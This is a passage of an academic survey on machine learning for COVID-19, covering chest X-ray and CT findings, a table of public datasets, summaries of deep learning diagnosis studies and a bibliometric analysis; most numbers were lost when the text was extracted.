novelty of the virus, centralizing the collection of sources of data will help researchers access different types of covid- -related data and provide them opportunities to work on a different aspect of covid- that may lead to novel discoveries. table has five columns, where the first, second, third, fourth, and fifth columns represent the reference, data, owners, source/accessibility, and remarks, respectively. we only present the projects that revealed and fully discussed their data sources. covid- on cxr and ct scan images in this section, we discuss the diagnosis of covid- based on x-ray and ct scan images because of their high value in covid- screening. table shows that researchers heavily utilize x-rays and ct scans in developing a machine-learning-based covid- diagnosis tool. guan et al. ( ) and wong et al. ( ) found that portable chest radiography (cxr) has a sensitivity of % for the initial detection of covid- -related abnormalities. radiographic abnormalities, when present, mirror those of ct, with a bilateral lower zone, a peripherally predominant consolidation, and hazy opacities (world health organization, ). the radiological findings of covid- on cxr are those of atypical pneumonia or organizing pneumonia (kooraki et al., ). although chest ct scans are reportedly less sensitive than cxrs, chest radiography remains the first-line imaging modality of choice used for patients with suspected covid- infection (hui et al., ) because it is cheap and readily available, and can easily be cleaned. for ease of decontamination, the use of portable radiography units is preferred. chest radiographs are often normal in early or mild disease. according to a recent study of patients with covid- requiring hospitalization, % had an abnormal chest radiograph at the initial time of admission, and % had radiographic abnormalities sometime during hospitalization. the findings are reported to be most extensive about – days after symptom onset. the most frequent radiographic findings are airspace opacities, whether described as consolidation or less commonly, ground-glass opacity (ggo) (wong et al., ). the distribution is most often bilateral, peripheral, and lower zone predominant chiroma et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ (rodrigues et al., ). unlike parenchymal abnormalities, pleural effusion is rare ( %) (wong et al., ). according to the center for disease control (cdc), even if a chest ct or x-ray suggests covid- , viral testing is the only specific method for diagnosis. radiography’s sensitivity was reported at only % for detection of lung opacities related to covid- , among patients seen in south korea with a reported specificity of % (wen et al., ). the x-ray image should be considered a useful tool for detecting covid- which is challenging the healthcare system due to the overflow of patients. as the covid- pandemic grinds on, clinicians on the front lines may increasingly turn to radiography (casey, ). the most frequent findings are airspace opacities, whether described as consolidation or less commonly, ggo. the distribution is most often bilateral, peripheral, and lower zone predominant (wong et al., ). much of the imaging focus is on ct. in february , chinese studies revealed that chest ct achieved a higher sensitivity for the diagnosis of covid- compared with initial rt–pcr tests of pharyngeal swab samples (ai et al., ; fang et al., ). subsequently, the national health commission of china briefly accepted chest ct findings of viral pneumonia as a diagnostic tool for detecting covid- infection (yuen et al., ; zu et al., ). the typical appearance of covid- on chest ct consists of multi-lobar, bilateral, predominantly lower lung zone, rounded ggos, with or without consolidation, in a mostly peripheral distribution. however, such findings are nonspecific; the differential diagnosis includes organizing pneumonia and other infections, drug reactions, and other inflammatory processes. consequently, using ct to screen for covid- may result in false positives. moreover, the presence of abnormalities not typically associated with covid- infection, including pure consolidation, cavitation, thoracic lymphadenopathy, and nodules suggests a different etiology (bernheim et al., ). covid- -related chest ct abnormalities are more likely to appear after symptom onset, but they may also precede clinical symptoms. in a retrospective study by bernheim et al. ( ), % of patients presenting within days of symptom onset had an abnormal chest ct, while % presenting within – days and % presenting after days had abnormal chest cts. shi et al. ( ) found ggos in of asymptomatic healthcare workers with confirmed covid- . similarly, % of asymptomatic passengers with covid- on the diamond princess cruise ship had findings of viral pneumonia on the ct (inui et al., ). in a prospective study by wang et al. ( b) pure ggos were the only abnormalities seen prior to symptom onset. subsequently, % of patients developed superimposed septal thickening – days after symptom onset. architectural distortion evolving from ggos appeared later in the disease course, likely reflecting organizing pneumonia and early fibrosis. long-term follow-up imaging is also needed to determine the sequelae of sars-cov- infection. in a retrospective study by das et al. ( ), % of patients who recovered from mers-cov developed pulmonary fibrosis; a similar outcome following covid- is likely. lung ultrasound offers a low-cost, point-of-care evaluation of the lung parenchyma without ionizing radiation. the modality is especially useful in resource-limited settings (stewart et al., ). peng, wang & zhang ( ) found that chiroma et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ table summary of covid- data sources and accessibility. reference data owners source/accessibility remarks apostolopoulos & mpesiana ( ), ozturk et al. ( ), salman et al. ( ), toğaçar, ergen & cömert ( ), ucar & korkmaz ( ) and loey, smarandache & khalifa ( ) x-ray cohen https://github.com/ ieee /covid- chestxray-dataset a project with a collection of x-rays images apostolopoulos & mpesiana ( ) x-ray kaggle https://www.kaggle. com/andrewmvd/ convid -x-rays dataset_ : images with covid- , images with common bacterial pneumonia, and normal images condition dataset_ : cases of covid- , healthy instances, and has both bacterial and viral pneumonia ardakani et al. ( ) ct scan ardakani et al. ( ) -mdct scanner (alexion, toshiba medical system, japan) the data contained ct slices from patients confirmed covid- and patients without covid- ayyoubzadeh et al. ( ) and vaid, cakan & bhandari ( ) time series worldometer https://www. worldometers.info/ coronavirus/ the daily new covid- cases from / , , to / / in iran. dataset features: previous day’s search trends, previous day cases, and output: new cases of the current day barbosa & fernandes ( ) genome barbosa & fernandes ( ) https://data.mendeley. com/datasets/ nvk bf m f/ the data is chaos game representation of sars-cov- containing both the raw and processed data with instances of sars-cov- genome butt et al. ( ) ct scan butt et al. ( ) butt et al. ( ) the data comprised of ct scan samples including from covid- patients chimmula & zhang ( ) time series johns hopkins university and canadian health authority chimmula & zhang ( ) the data is available in time series: date, month and year up to / / huang et al. ( b) ct scan huang et al. ( b) huang et al. ( b) covid- patients that underwent a ct chest scan from / / to / / li et al. ( b) ct scan li et al. ( b) li et al. ( b) data from , patients comprising of chest ct scans. data collection period from / / to / / liu et al. ( a) time series . tencent news real covid- reporting: https:// news.qq.com/zt / page/feiyan.htm? adtag=area . covid- time-series data including locations confirmed cases, deaths, recovery cases, and new diagnosed cases . baidu baidu: http://qianxi. baidu.com . baidu is an open-source for big data project that provides visualization of population migration oh, park & ye ( ) x-ray society of radiological technology oh, park & ye ( ) segmentation network dataset with a total of posteroanterior chest radiographs chiroma et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://github.com/ieee /covid-chestxray-dataset https://github.com/ieee /covid-chestxray-dataset https://github.com/ieee /covid-chestxray-dataset https://www.kaggle.com/andrewmvd/convid -x-rays https://www.kaggle.com/andrewmvd/convid -x-rays https://www.kaggle.com/andrewmvd/convid -x-rays https://www.worldometers.info/coronavirus/ https://www.worldometers.info/coronavirus/ https://www.worldometers.info/coronavirus/ https://data.mendeley.com/datasets/nvk bf m f/ https://data.mendeley.com/datasets/nvk bf m f/ https://data.mendeley.com/datasets/nvk bf m f/ https://news.qq.com/zt /page/feiyan.htm?adtag=area https://news.qq.com/zt /page/feiyan.htm?adtag=area https://news.qq.com/zt /page/feiyan.htm?adtag=area https://news.qq.com/zt /page/feiyan.htm?adtag=area http://qianxi.baidu.com http://qianxi.baidu.com http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ sonographic findings in patients with covid- correlated with typical ct abnormalities. the predominantly peripheral distribution of lung involvement facilitated sonographic visibility. characteristic findings included thickened, irregular pleural lines, b lines table (continued) reference data owners source/accessibility remarks qiang et al. ( ) protein sequence china national genomic data center https://bigd.big.ac.cn/ ncov the database has an extensive protein sequence randhawa et al. ( ) genome national center for biotechnology information https://sourceforge.net/ projects/mldsp-gui/ files/ covid dataset the database has genome dataset with thousands of bp ribeiro et al. ( ) time series ribeiro et al. ( ) https://brasil.io/api/ dataset/covid /caso/ data/?place_ type=state daily covid- reports on confirmed cases from different states in brazil singh et al. ( ) ct scan singh et al. ( ) singh et al. ( ) chest ct scan images from icu tiwari, kumar & guleria ( ) time series center for systems science and engineering (csse) at johns hopkins university (jhu). https://www.kaggle. com/ sudalairajkumar/ novel-corona-virus- -dataset confirmed covid- cases, recovered cases, and death cases from china tuli et al. ( ) time series hannah ritchie https://ourworldindata. org/coronavirus- source-data the dataset is the our world in data provided by hannah ritchie wu et al. ( ) ct scan wu et al. ( ) wu et al. ( ) the ct scan images of patients were collected from three hospitals in china yang et al. ( b) time series . national health commission of china . http://www.nhc.gov. cn/xcs/yqtb/list_ gzbd.shtml sars and covid- datasets . https://qianxi.baidu. com/ . baidu . http://news.sohu. com/ / / subject . shtml . sohu hurt, kligerman & hsiao ( ) x-ray hurt, kligerman & hsiao ( ) hurt, kligerman & hsiao ( ) chest x-ray images from china and america jiang et al. ( ) ct scan & clinical characteristics jiang et al. ( ) jiang et al. ( ) ct scan images and clinical characteristics liu et al. ( a) ct scan liu et al. ( a) liu et al. ( a) chest ct scan that was performed using a -slice ct scanner without contrast agents. mei et al. ( ) ct scan and clinical information mei et al. ( ) mei et al. ( ) both clinical information and chest ct scan images were collected for the study pirouz et al. ( ) time series pirouz et al. ( ) pirouz et al. ( ) environmental and urban data yang et al. ( a) ct scan yang et al. ( a) yang et al. ( a) ct scan images from a hospital in china chiroma et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://bigd.big.ac.cn/ncov https://bigd.big.ac.cn/ncov https://sourceforge.net/projects/mldsp-gui/files/covid dataset https://sourceforge.net/projects/mldsp-gui/files/covid dataset https://sourceforge.net/projects/mldsp-gui/files/covid dataset https://sourceforge.net/projects/mldsp-gui/files/covid dataset https://brasil.io/api/dataset/covid /caso/data/?place_type=state https://brasil.io/api/dataset/covid /caso/data/?place_type=state https://brasil.io/api/dataset/covid /caso/data/?place_type=state https://brasil.io/api/dataset/covid /caso/data/?place_type=state https://www.kaggle.com/sudalairajkumar/novel-corona-virus- -dataset https://www.kaggle.com/sudalairajkumar/novel-corona-virus- -dataset https://www.kaggle.com/sudalairajkumar/novel-corona-virus- -dataset https://www.kaggle.com/sudalairajkumar/novel-corona-virus- -dataset https://www.kaggle.com/sudalairajkumar/novel-corona-virus- -dataset https://ourworldindata.org/coronavirus-source-data https://ourworldindata.org/coronavirus-source-data https://ourworldindata.org/coronavirus-source-data http://www.nhc.gov.cn/xcs/yqtb/list_gzbd.shtml http://www.nhc.gov.cn/xcs/yqtb/list_gzbd.shtml http://www.nhc.gov.cn/xcs/yqtb/list_gzbd.shtml https://qianxi.baidu.com/ https://qianxi.baidu.com/ http://news.sohu.com/ / /subject .shtml http://news.sohu.com/ / /subject .shtml http://news.sohu.com/ / /subject .shtml http://news.sohu.com/ / /subject .shtml http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ (edema), and eventual appearance of a lines (air) during recovery. peng, wang & zhang ( ) suggested that ultrasound may be useful in recruitment maneuver monitoring and guide prone positioning. chest ct is an indispensable tool for the early screening and diagnosis of suspected covid- infection in patients. previous studies confirmed that the majority of patients infected with covid- exhibited common chest ct characteristics, including ggos and consolidation, which reflect lesions affecting multiple lobes or infections in the bilateral lung parenchyma. increasing evidence suggests that these chest ct characteristics can be used to screen suspected patients and serve as a diagnostic tool for covid- - caused acute respiratory diseases (ards) (xu et al., ). these findings have led to the modification of the diagnosis and treatment protocols of sars-cov- -caused pneumonia to include patients with characteristic pneumonia features on chest ct but negative rt–pcr results in severe epidemic areas such as wuhan city and hubei province (liu et al., a). patients with negative rt–pcr but positive ct findings should be isolated or quarantined to prevent clustered or wide-spread infections. the critical role of ct in the early detection and diagnosis of covid- becomes more publicly acceptable. however, several studies also reported that a proportion of rtpcr-positive patients, including several severe cases, had initially normal cxr or ct findings (fang et al., ). according to the diagnostic criteria of covid- , patients might have no or atypical radiological manifestations even at the mild or moderate stages because several lesions are easily missed in the low-density resolution of cxr, suggesting that chest ct may be a better modality with a lower false-negative rate. another possible explanation is that in several patients, the targeted organ of covid- may not be the lung. multiple-organ dysfunctions, including ards, acute cardiac injury, hepatic injury, and kidney injury, have been reported during covid- infection (huang et al., a). studies also reported the chest ct appearances in patients with covid- after treatment, suggesting its critical role in treatment evaluation and follow up. for example, a study investigated the change in chest ct findings associated with covid- at different time points during the infection course (pan et al., ). the results showed that most apparent abnormalities on the chest ct were still observable for days but disappeared at days after the initial onset of symptoms. unexpectedly, a case report showed pre- and post-treatment chest ct findings of a -year-old woman whose rt–pcr result became negative, while pulmonary lesions were reversal (duan & qin, ). deep learning applications for covid- singh et al. ( ) developed a deep cnn, which was applied in the automated diagnosis and analysis of covid- in infected patients to save the time and energy of medical professionals. they tuned and used the hyperparameters of cnn by using multi-objective adaptive differential evolution (made). further in the course of their experiments which were extensively carried out, they used several benchmark covid- datasets. the data used to evaluate the performance of their proposed model were divided into training and testing datasets. the training sets were used to build the covid- chiroma et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ classification model. then, the hyperparameters of the cnn model were optimized on the training sets by using the made-based optimization approach. the results from the comparative analysis showed that their proposed method outperformed existing machine learning models such as cnn, ga-based cnn, and pso-based cnn in terms of different metrics (including f-measure, sensitivity, specificity, and kappa statistics). jaiswal et al. ( ) applied deep learning models for the diagnosis and detection of covid- , and it was called densenet -based deep transfer learning (dtl). the authors used these pre-trained deep learning architecture as automation tools to detect and diagnose covid- in chest ct scans. the dtl model was used to classify patients as covid- positive (+ve) or covid- negative (−ve). the proposed model was also utilized to extract several features by adopting its own learned weights on the imagenet dataset along with a convolutional neural structure. extensive analysis of the experiments showed that the proposed dtl-based covid- model was superior to competing methods. the proposed densenet model achieved a % accuracy compared with other models and could serve as an alternative to other covid- testing kits. li et al. ( c) developed a fully automated ai system to assess the severity of covid- and its progression quantitatively using thick-section chest ct images. the ai system was implemented to partition and quantify the covid- -infected lung regions on thick-section chest ct images automatically. the data generated from the automatically segmented lung abnormalities were compared with those of the manually segmented abnormalities of two professional radiologists by using the dice coefficient on a randomly selected subset of ct scans. during manual and automatic comparisons, two biomarker images were automatically computed, namely, the portion of infection (poi) and the average infection hu (ihu), which were then used to assess the severity and progression of the viral disease. the performance of the assessments was then compared with patients’ status of diagnosis reports, and key phrases were extracted from the radiology reports using the area under the receiver’s operating characteristic curve (auc) and cohen’s kappa statistics. further in their study, the poi was the only computed imaging biomarker that was effective enough to show high sensitivity and specificity for differentiating the groups with severe covid- and groups with non-severe covid- . the ihu reflected the progress rate of the infection but was affected by several irrelevant factors such as the construction slice thickness and the respiration status. the results of the analysis revealed that the proposed deep-learning-based ai system accurately quantified the covid- strains associated with the lung abnormalities, and assessed the virus’ severity and its corresponding progression. their results also showed that the deep learning-based tool can help cardiologists in the diagnosis and follow-up treatment for patients with covid- based on the ct scans. singh, kumar & kaur ( ) used a cnn to classify patients with covid- as covid- +ve or covid- −ve. the initial parameters of cnn were tuned by using mode. the authors adopted the mutation, crossover, and selection operations of the differential evolution (de) algorithm. they extracted the chest ct dataset of covid- - infected patients and decomposed them into training and testing groups. the proposed mode-based cnn and competitive classification models were then applied to the chiroma et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ training dataset. they compared the competitive and proposed classification models by considering different fractions of the training and testing datasets. the extensive analysis showed that the proposed model classified the chest ct images at reasonable accuracy rates compared with other competing models, such as ann, anfis, and cns. the proposed model was also useful for covid- disease classification from chest ct images. asif & wenhui ( ) implemented a model that automatically detected covid- pneumonia in patients using digital cxr images while maximizing the accuracy in detection by using deep convolutional neural networks (dcnn). their model named dcnn-based model inception v with transfer learning detected covid- infection in patients using cxr radiographs. the proposed dcnn also provided insights on how deep transfer learning methods were used for the early detection of the disease. the experimental results showed that the proposed dcnn model achieved high accuracy. the proposed model also exhibited excellent performance in classifying covid- pneumonia by effectively training itself from a comparatively lower collection of images. hu et al. ( ) implemented a weak supervised deep learning model for detecting and classifying covid- infection from ct images. the proposed model minimized the requirements of manual labeling of ct images and accurately detected the viral disease. the model could distinguish positive covid- cases from non-positive covid- cases by using covid- samples from retrospectively extracted ct images from multiple scanners and centers. the proposed method accurately pinpointed the exact position of the lesions (inflammations) caused by the viral covid- and potentially provided advice on the patient’s severity to guide the disease triage and treatment. the experimental results indicated that the proposed model achieved high accuracy, precision, and classification as well as good qualitative visualization for the lesion detections. ayyoubzadeh et al. ( ) conducted a study to predict the incidence and occurrence of covid- in iran. the authors obtained data from the google trends website (recommender systems) and used linear regression and lstm models to estimate the number of positive covid- cases from the extracted data. root mean square error and -fold cross-validation were used as performance metrics. the predictions obtained from the google trend’s website were not very precise but could be used to build a base for accurate models for more aggregated data. their study showed that the population (iranians) focused on the usage of hand sanitizer and handwashing practices with antiseptic as preventive measures against the disease. the authors used specific keywords related to covid- to extract google search frequencies and used the extracted data to predict the degree of covid- epidemiology in iran. they suggested future research direction using other data sources such as social media information, people’s contact with the special call center for covid- , mass media, environmental and climate factors, and screening registries. randhawa et al. ( ) integrated supervised machine learning with digital signal processing called mldsp for genome analyses, which were then augmented by a dt approach to the machine learning component, and a spearman’s rank correlation coefficient analysis for result validation. the authors identified an intrinsic covid- virus genome signature and used it together with a machine-learning-based alignment-free chiroma et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ approach for an ultra-fast, scalable, and highly accurate classification of the covid- genomes. they also demonstrated how machine learning used intrinsic genomic signature to provide a rapid alignment-free taxonomic classification of novel pathogens. the model accurately classified the covid- virus without having a priori knowledge by simultaneous processing of the geometric space of all relevant viral genomes. their result analysis supported the hypothesis of a bat origin and classified the covid- virus as sarbecovirus within betacoronavirus. also, their results were obtained through a comprehensive analysis of over , unique viral sequences through an alignment-free analysis of their d genomic signatures, combined with a dt use of supervised machine learning, and confirmed by spearman’s rank correlation coefficient analyses. farhat, sakr & kilany ( ) reviewed the developments of deep learning applications in medical image analysis which targeted pulmonary imaging and provided insights into contributions to covid- . the study covered a survey of various contributions from diverse fields for about years and highlighted various deep learning tasks such as classification, segmentation, and detection as well as different pulmonary pathologies such as airway diseases, lung cancer, covid- , and other infections. the study summarized and discussed current state-of-the-art approaches in the research domain, highlighting the challenges, especially given the current situation of covid- . first, the authors provided an overview of several medical image modalities, deep learning, and surveys on deep learning in medical imaging, in addition to available datasets for pulmonary medical images. second, they provided a summarized survey on deep-learning- based applications and methods on pulmonary medical images. third, they described the covid- disease and related medical imaging concerns, summarized reviews on deep learning application to covid- medical imaging analysis, and listed and described contributions to this domain. finally, they discussed the challenges experienced in the research domain and made suggestions for future research. survey and bibliometric analysis survey analysis in this survey, we review the projects that used machine learning to fight covid- from a different perspective. we only considered published papers in reputable journals, and conferences, and no preprint papers uploaded in preprint server was used in the survey. we apprized studies that reported the description of the machine learning approach to fighting covid- . we found that machine learning has made an inroad into fighting covid- from a different aspect with potential for real-life applications to curtail the negative effect of covid- . machine learning algorithms such as cnn, lstm, and ann that are utilized in fighting covid- mostly reported excellent performance compared with the baseline approaches. many of the studies complained about the scarcity of sufficient data to carry out large-scale study because of the novelty of the covid- pandemic. we found that various studies used different covid- data. figure depicts the type of data used in different studies that applied machine learning algorithm to develop different models for fighting covid- pandemic. the data used to plot fig. were chiroma et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ extracted from machine learning research on covid- (refer to table ). the longest bars show that x-rays and ct scans have the highest patronage from the studies. many of the studies used deep learning algorithms, for example, cnn and lstm, for the diagnosis of covid- on x-rays and ct scans. the evaluation indicated the excellent performance of the algorithms in detecting covid- on x-rays and ct scan images. the ct scan has a great value in the screening, diagnosis, and follow up of patients with covid- . the ct scan has now been added as a criterion for diagnosing of covid- (liu et al., a; li et al., c). the x-rays with covid- pandemic data project by cohen hosted on github is receiving unprecedented attention from the research community for accessing freely available data. figure presents the frequency of machine learning algorithms adopted to fight covid- . the longest bar indicates that cnn received the most considerable attention from the researchers working in this domain to fight covid- . the likely reason why cnn has the highest number of applications is that most of the data used in detecting covid- infection in patients are images (see fig. ). cnn is well known for its robustness, effectiveness, and efficiency in image processing compared with other conventional machine learning algorithms because of its automated feature engineering and high performance. the cnn variant suitable for the diagnosis of covid- from x-ray and ct scan images is resnet. however, many of the studies did not provide the specific type of cnn adopted for the diagnosis of the covid- from x-ray and ct scan images (see table ). figure shows the different aspects where machine learning algorithms were applied in fighting covid- . we found that the studies mainly adopted machine figure visual representation of covid- data extracted from different projects. full-size doi: . /peerj-cs. /fig- chiroma et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ learning algorithms in developing covid- diagnosis tools, decision support system, drug development, and detection from protein sequence. the most extended portion of the pie chart indicates that diagnostic tools attracted the most considerable attention, showing the quest for diagnostic tools in the fight against covid- pandemic because the match starts with a diagnosis before the appropriate treatment is administered to save a life, and incorrect diagnosis can lead to inappropriate medication, resulting in further health complications. most of the studies that adopted machine learning to develop diagnostic tools intended to reduce the workload of radiologists, improve the speed of diagnosis, automate the covid- diagnostic process, reduce the cost compared with traditional laboratory tests, and help healthcare workers in making critical decisions. the studies argued that the diagnostic tool could reduce the exposure of healthcare workers to patients with covid- , thus decreasing the risk of spreading covid- to healthcare workers. the second part of the pie chart with the most substantial portion is the decision support system for detecting the rate of spread of the virus, confirmed cases, mortalities, and recovered cases. this information from the decision support system can help the government functionaries, policymakers, decision makers, and other stakeholders in formulating policy that can help fight covid- pandemic. figure shows that the publications on the adoption of machine learning to fight covid- started appearing in with no publications in , although covid- started appearing in late . this situation is likely because a new virus-like the figure machine learning algorithms adopted in fighting covid- . full-size doi: . /peerj-cs. /fig- chiroma et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ figure different aspect of machine learning applications in fighting covid- pandemic. full-size doi: . /peerj-cs. /fig- figure trend of publications on machine learning applications in fighting covid- . full-size doi: . /peerj-cs. /fig- chiroma et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ covid- pandemic at the initial stage lacks data and has scant information and uncertainties. bibliometric analysis the primary purpose of conducting a bibliometric analysis study in this study is to reflect the trend of rapidly emerging topics on covid- research, where substantial research activity has already begun extensively during the early stage of the outbreak. another significance of the bibliometric analysis method presented is to aid in the mapping of research situation on coronavirus disease as reported in several scientific works of literature by the research community. in this section, we present the bibliographic coupling among different article items on machine learning to fight covid- . the link between the items on the constructed map corresponds to the weight between them either in terms of the number of publications, common references, or co-citations. these items may belong to a group or a cluster. in the visualization, items within the same cluster are marked with the same color, and colors indicate the cluster to which a journal was assigned by the clustering technique implemented by the vosviewer software. the circular node may represent the items, and their sizes may vary depending on the weight of the article. prolific authors the bibliographic coupling between the top authors is shown in fig. . the two clusters, namely, red and green, correspond to all authors working on similar research fields “covid- ” and citing the same source in their reference listings. the similarity in cluster color for the authors also implies that the degree of overlap between the reference lists of publications of these authors is higher. figure shows the visible names, and other names may not be represented in the constructed map. figure bibliographic coupling among the authors. two clusters, namely red (left) and green (right), correspond to all authors working on similar research fields “covid- ” and citing the same sources in their reference listings. full-size doi: . /peerj-cs. /fig- chiroma et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ productive countries figure shows the bibliographic coupling of the topmost productive countries. here, bibliographic coupling indicates that a common reference list in the articles published by these countries. the five clusters are represented by six colors. red represents china and the usa with the highest strength in terms of contributions, after which comes india and iran as the next countries within the red node. green represents hong kong, which appears to have the highest strength, whereas blue is for the united kingdom and saudi arabia that have the highest strength. yellow denotes japan, singapore, thailand, and taiwan as the highest contributors. purple refers to italy and canada as the two contributing countries. the link between the red and green clusters are thicker compared with that between the blue and red clusters, or between the blue and purple clusters. the thickness of the link simply depicts the degree of intersection of the literature work between the different locations or countries. figure bibliographic coupling among the countries. red represents china and the usa with the highest strength in terms of contributions, after which comes india and iran as the next countries within the red node. green represents hong kong, which appears to have the highest strength, whereas blue is for the united kingdom and saudi arabia that have the highest strength. yellow denotes japan, singapore, thailand, and taiwan as the highest contributors. purple refers to italy and canada as the two contributing countries. full-size doi: . /peerj-cs. /fig- chiroma et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ collaborating institution figure shows the bibliographic coupling of the network of collaborating institutions that are affiliated with at least four documents on covid- research. map construction and analysis show that of the institutions, meet the thresholds of collaborating institutions, including the guangzhou center for disease control (or chinese center for disease control and prevention), huazhong university of science and technology, wuhan university, capital medical university, chinese academy of medical sciences, university of hong kong, sun yat-sen university, and fudan university. two clusters are identified by red and green colors. institutions that fall under the same groups appear to have similar literature background or worked on related research fields. journals bibliographic coupling between journals implies that the papers published in these journals have more common reference lists. three clusters are depicted on the map with red, blue, and green colors. the links with the highest strength occur between emerging microbes journal, journal of virology, and journal of infection. this link is closely followed by the links between eurosurveillance and journal of infection, archive of academic emergency medicine, chinese medical journal, and the lancet. the journal of infection control and hospital and journal of hospital infection form the weakest networks of a cluster. figure illustrates the bibliographic coupling between the considered journals. co-authorship and authors figure illustrates the co-authors and author map visualization. this analysis aims to produce the visualization of all the major authors publishing together or working on figure bibliographic coupling among institutions. two clusters, namely red (left) and green (right), correspond to all authors working on similar research fields “covid- ” and citing the same sources in their reference listings. full-size doi: . /peerj-cs. /fig- chiroma et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ similar research fields. the analysis type is co-authorship, and the unit of analysis is authors. the threshold of the minimum number of articles by an author is . network construction and analysis shows that of , authors, only nine authors meet the limits. however, the most extensive set of connected entities consists of only eight authors, whose visual representation is depicted in fig. , where only one cluster is denoted by red color. the connected link illustrates that these authors have collaborated on the same project or worked on the same research with a similar focus. the thickness of the link between these three authors indicates more common publications. figure co-authorship and authors’ analysis. the four main clusters, namely, blue (right), red (bottom-centre), green (top-centre), pink (left) match all the major co-authors and authors publishing together or working on similar research fields. full-size doi: . /peerj-cs. /fig- figure bibliographic coupling among the journals. three clusters are depicted on the map with red (left), blue (bottom-centre), and green (right) colors. each cluster shows covid- published papers with more common reference lists among the associated journals. full-size doi: . /peerj-cs. /fig- chiroma et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ impact analysis figure illustrates the citation analysis among authors’ institutions. six clusters are represented using different colors. the red cluster has the highest number of author citations from two institutions, namely, the huazhong university of science and technology, wuhan university (state key laboratory of virology), and the department of microbiology, university of hong kong. figure shows the bibliometric analyses of figure author citation by journal source. three major clusters, namely, red (left), lemon-green (top-right), and green (bottom-left) were identified in the analysis, as the top-cited journal sources as per author publications. full-size doi: . /peerj-cs. /fig- figure author citation by institution. six clusters are represented using different colors to denotes authors citation counts per institution, for which only the red (bottom-left) cluster has the highest number of author citations from two institutions in china. full-size doi: . /peerj-cs. /fig- chiroma et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ author citations by journal sources. a link between two journal sources indicates the citation connectivity between the two sources. the connected links between the journal of virology and the new england journal of medicine in fig. reveal that a publication from the journal of virology has cited another publication that is published in the new england journal of medicine or vice versa. the thickness and link strength signify more numbers of citation among the clusters. therefore, among the different clusters identified in the analysis, the journal of virology is the top-cited source by publication from other journal sources. challenges and future research opportunities in this section, we present challenges and future research prospects. more so, fig. describes the course of conducting the literature survey and opportunities for future research with the possibility of solving the challenges to help expert researchers easily identify areas that need development. the challenges and future research opportunities are presented as follows: lack of sufficient covid- data: the primary concern with the research in covid- is the barrier prompted by the lack of adequate covid- clinical data (alimadadi et al., ; mei et al., ; ayyoubzadeh et al., ; fong et al., ; oh, park & ye, ; toğaçar, ergen & cömert, ; ucar & korkmaz, ; belfiore et al., ). however, an in-depth analysis of patients with covid- requires much more data (apostolopoulos & figure visual representation of the challenges. full-size doi: . /peerj-cs. /fig- chiroma et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ mpesiana, ). data is the key component in machine learning. machine learning approaches typically experience a limitation in their efficiency and effectiveness in solving machine learning problems without sufficient data. therefore, insufficient covid- clinical data can limit the performance of specific machine learning algorithms, such as deep learning algorithms that require large-scale data. in this case, developing machine- learning-based covid- diagnostic and prognosis tools, and therapeutic approaches to curtail covid- , and predicting a future pandemic can face a severe challenge in terms of performance due to insufficient covid- clinical data. alimadadi et al. ( ) suggested global collaborations among stakeholders to build covid- clinical database and mitigate the issue of inadequate covid- clinical data. existing biobanks containing the data of patients with covid- are integrated with covid- clinical data. we suggest that researchers use gan to generate additional x-rays and ct scan images for covid- to obtain sufficient data for building covid- diagnosis tools. for example, loey, smarandache & khalifa ( ) were motivated by insufficient data and used gan to generate more x-ray images and develop a covid- diagnostic tool. visualization from x-rays and ct scan: figure shows that x-ray and ct scan are the two primary clinical data for detecting covid- infection in patients. distinguishing patients with covid- and mild symptoms from pneumonia on x-ray images could be visualized inaccurately or cannot be visualized totally (apostolopoulos & mpesiana, ). we suggest that researchers propose machine learning strategies that can accurately differentiate patients with covid- and mild symptoms from patients with pneumonia symptoms based on x-ray images. covid- that is caused by coronavirus might have a ct scan image characteristic similar to other pneumonia caused by a different virus. in the future, the performance of cnn should be evaluated in classifying covid- and viral pneumonia with rt–pcr (li et al., b). uncertainties: when a new pandemic breaks out, it comes with limited information and very high uncertainly, unlike the commonly known influenza. therefore, knowledge regarding the new epidemic is not sufficient due to the absence of a prior case that is the same as the recent pandemic. in the case of covid- , many of the decision makers relied on sars for reference because of the similarity, even though it is considerably different from covid- . the new pandemic typically poses a 